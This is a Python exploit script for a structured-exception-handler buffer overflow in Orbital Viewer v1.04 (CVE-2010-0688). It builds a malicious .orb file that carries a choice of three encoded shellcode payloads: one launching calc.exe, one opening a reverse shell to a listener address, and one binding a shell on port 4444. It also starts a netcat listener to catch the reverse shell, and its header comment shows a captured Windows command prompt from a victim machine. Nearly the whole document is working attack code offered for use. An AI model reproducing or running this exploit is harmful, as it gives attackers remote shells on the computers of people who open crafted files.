#!/usr/bin/python # sinn3r: I'm just submitting this for mr_me # ################################################################ # # Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit # Date: 27 Feb 2010 # CVE: CVE-2010-0688 # Download: http://www.orbitals.com/orb/ov.htm # Found & exploited by: mr_me (http://net-ninja.net) # Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees # Tested on: Windows xp sp3 # ################################################################ # Bad chars: \x00\x0a\xbd\x0d\x20 # Here we go.. ! ...all the way from Australia... # # [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit # [+] Shellcode options # 1: calc.exe # 2: reverse shell # 3: bind shell # [+] which shellcode? 2 # [+] Vulnerable file created! # [+] Listening on port 4444... # listening on [any] 4444 ... # 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out # connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Documents and Settings\Steve> # import sys, os print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit" # windows/exec - 303 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, CMD=calc.exe calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" "\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55" "\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c" "\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b" "\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49" "\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51" "\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50" "\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34" "\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51" "\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31" "\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50" "\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30" "\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c" "\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a" "\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a" "\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43" "\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45" "\x50\x41\x41") # windows/shell_reverse_tcp - 636 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444 rev = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b" "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b" "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x43\x31\x4a" "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x45\x51" "\x4a\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50" "\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x43\x44\x45\x57" "\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4a\x54\x47" "\x4b\x50\x54\x46\x44\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f" "\x47\x54\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c" "\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b" "\x4b\x39\x42\x4c\x51\x34\x45\x4c\x45\x31\x48\x43\x46\x51\x49" "\x4b\x42\x44\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c" "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51" "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f" "\x48\x56\x45\x36\x46\x33\x43\x56\x45\x38\x46\x53\x46\x52\x43" "\x58\x43\x47\x43\x43\x47\x42\x51\x4f\x46\x34\x4b\x4f\x4e\x30" "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" "\x56\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x43\x38" "\x43\x32\x51\x45\x42\x4a\x43\x32\x4b\x4f\x48\x50\x43\x58\x4e" "\x39\x45\x59\x4b\x45\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43" "\x46\x33\x51\x43\x51\x43\x51\x53\x51\x43\x47\x33\x46\x33\x4b" "\x4f\x4e\x30\x42\x48\x49\x50\x49\x38\x44\x42\x44\x4a\x42\x46" "\x42\x48\x42\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4b\x51\x4d" "\x45\x42\x48\x4a\x4c\x4c\x39\x4e\x4a\x43\x50\x51\x47\x4b\x4f" "\x48\x56\x42\x4a\x42\x30\x46\x31\x50\x55\x4b\x4f\x48\x50\x45" "\x36\x43\x5a\x42\x44\x45\x36\x42\x48\x43\x53\x42\x4d\x43\x5a" "\x50\x50\x46\x39\x47\x59\x48\x4c\x4c\x49\x4a\x47\x43\x5a\x47" "\x34\x4c\x49\x4d\x32\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4a\x35" "\x4d\x59\x4b\x4d\x4b\x4e\x51\x52\x46\x4d\x4b\x4e\x50\x42\x46" "\x4c\x4c\x4d\x43\x4a\x47\x48\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48" "\x44\x32\x4b\x4e\x4e\x53\x42\x36\x4b\x4f\x44\x35\x47\x58\x4b" "\x4f\x4e\x36\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51" "\x42\x4a\x45\x51\x46\x31\x50\x51\x46\x35\x46\x31\x4b\x4f\x48" "\x50\x42\x48\x4e\x4d\x4e\x39\x44\x45\x48\x4e\x46\x33\x4b\x4f" "\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x4e\x30\x43" "\x58\x4d\x37\x43\x49\x48\x46\x44\x39\x4b\x4f\x43\x45\x43\x34" "\x4b\x4f\x49\x46\x4b\x4f\x42\x57\x4b\x4c\x4b\x4f\x4e\x30\x45" "\x38\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x4e\x36" "\x4b\x4f\x4e\x30\x41\x41") # windows/shell_bind_tcp - 695 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55 bind =("\xdb\xc1\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" "\x4c\x43\x5a\x4a\x4b\x50\x4d\x4a\x48\x4c\x39\x4b\x4f\x4b\x4f" "\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47" "\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f" "\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a" "\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4a\x4e\x50\x31" "\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x44\x47\x49" "\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47\x4b" "\x50\x54\x47\x54\x47\x58\x42\x55\x4d\x35\x4c\x4b\x51\x4f\x51" "\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" "\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4d" "\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b" "\x43\x54\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x47\x30\x44\x4c\x4c" "\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e" "\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48" "\x56\x45\x36\x50\x53\x42\x46\x43\x58\x47\x43\x46\x52\x42\x48" "\x43\x47\x44\x33\x50\x32\x51\x4f\x46\x34\x4b\x4f\x48\x50\x43" "\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49\x46" "\x51\x4f\x4c\x49\x4a\x45\x45\x36\x4d\x51\x4a\x4d\x44\x48\x45" "\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x48\x50\x42\x48\x49\x49" "\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x50\x53\x46" "\x33\x46\x33\x46\x33\x51\x43\x50\x43\x50\x53\x47\x33\x50\x53" "\x4b\x4f\x4e\x30\x45\x36\x42\x48\x44\x51\x51\x4c\x43\x56\x51" "\x43\x4c\x49\x4b\x51\x4d\x45\x43\x58\x49\x34\x44\x5a\x42\x50" "\x49\x57\x51\x47\x4b\x4f\x4e\x36\x42\x4a\x44\x50\x46\x31\x50" "\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4a\x49" "\x51\x47\x4b\x4f\x49\x46\x50\x53\x46\x35\x4b\x4f\x48\x50\x45" "\x38\x4d\x35\x51\x59\x4b\x36\x51\x59\x46\x37\x4b\x4f\x4e\x36" "\x46\x30\x46\x34\x51\x44\x51\x45\x4b\x4f\x48\x50\x4a\x33\x43" "\x58\x4a\x47\x42\x59\x49\x56\x42\x59\x51\x47\x4b\x4f\x49\x46" "\x46\x35\x4b\x4f\x4e\x30\x45\x36\x43\x5a\x45\x34\x43\x56\x42" "\x48\x42\x43\x42\x4d\x4d\x59\x4d\x35\x42\x4a\x46\x30\x51\x49" "\x47\x59\x48\x4c\x4d\x59\x4b\x57\x43\x5a\x51\x54\x4b\x39\x4a" "\x42\x50\x31\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x51\x52\x46\x4d" "\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58\x4e" "\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x45\x46" "\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x50" "\x52\x46\x31\x46\x31\x46\x31\x42\x4a\x43\x31\x46\x31\x46\x31" "\x46\x35\x46\x31\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x48\x59\x45" "\x55\x48\x4e\x46\x33\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b\x4f" "\x46\x57\x4b\x4f\x4e\x30\x4c\x4b\x46\x37\x4b\x4c\x4d\x53\x48" "\x44\x45\x34\x4b\x4f\x48\x56\x50\x52\x4b\x4f\x48\x50\x45\x38" "\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x46\x33\x4b\x4f\x49\x46\x4b" "\x4f\x4e\x30\x41\x41"); header = "\x4f\x72\x62\x69\x74\x61\x6c\x46" header += "\x69\x6c\x65\x56\x31\x2e\x30\x0d\x0a" nops = "\x90" * 1010 fly = "\xe9\xc8\xf9\xff\xff" nseh = "\xeb\xf9\x90\x90" seh = "\x50\x82\x45" # partial overwrite - ppr from ov.exe print "[+] Shellcode options" print "\t1: calc.exe" print "\t2: reverse shell" print "\t3: bind shell" msg = '[+] which shellcode? ' uin = raw_input(msg).strip() if not uin: print "[-] You have not entered 1,2 or 3, quiting" sys.exit(1) if uin == '1': junk = "\x41" * (5045 - len(calc)) lol = header + junk + nops + calc + fly + nseh + seh; if uin == '2': junk = "\x41" * (5045 - len(rev)) lol = header + junk + nops + rev + fly + nseh + seh; if uin == '3': junk = "\x41" * (5045 - len(bind)) lol = header + junk + nops + bind + fly + nseh + seh; try: vulnerable = open("mr_me-owns-orbital.orb",'w') vulnerable.write(lol) vulnerable.close() print "[+] Vulnerable file created!" if uin == '2': print "[+] Listening on port 4444..." os.system("nc -lvp 4444") except: print "[-] Error occured!"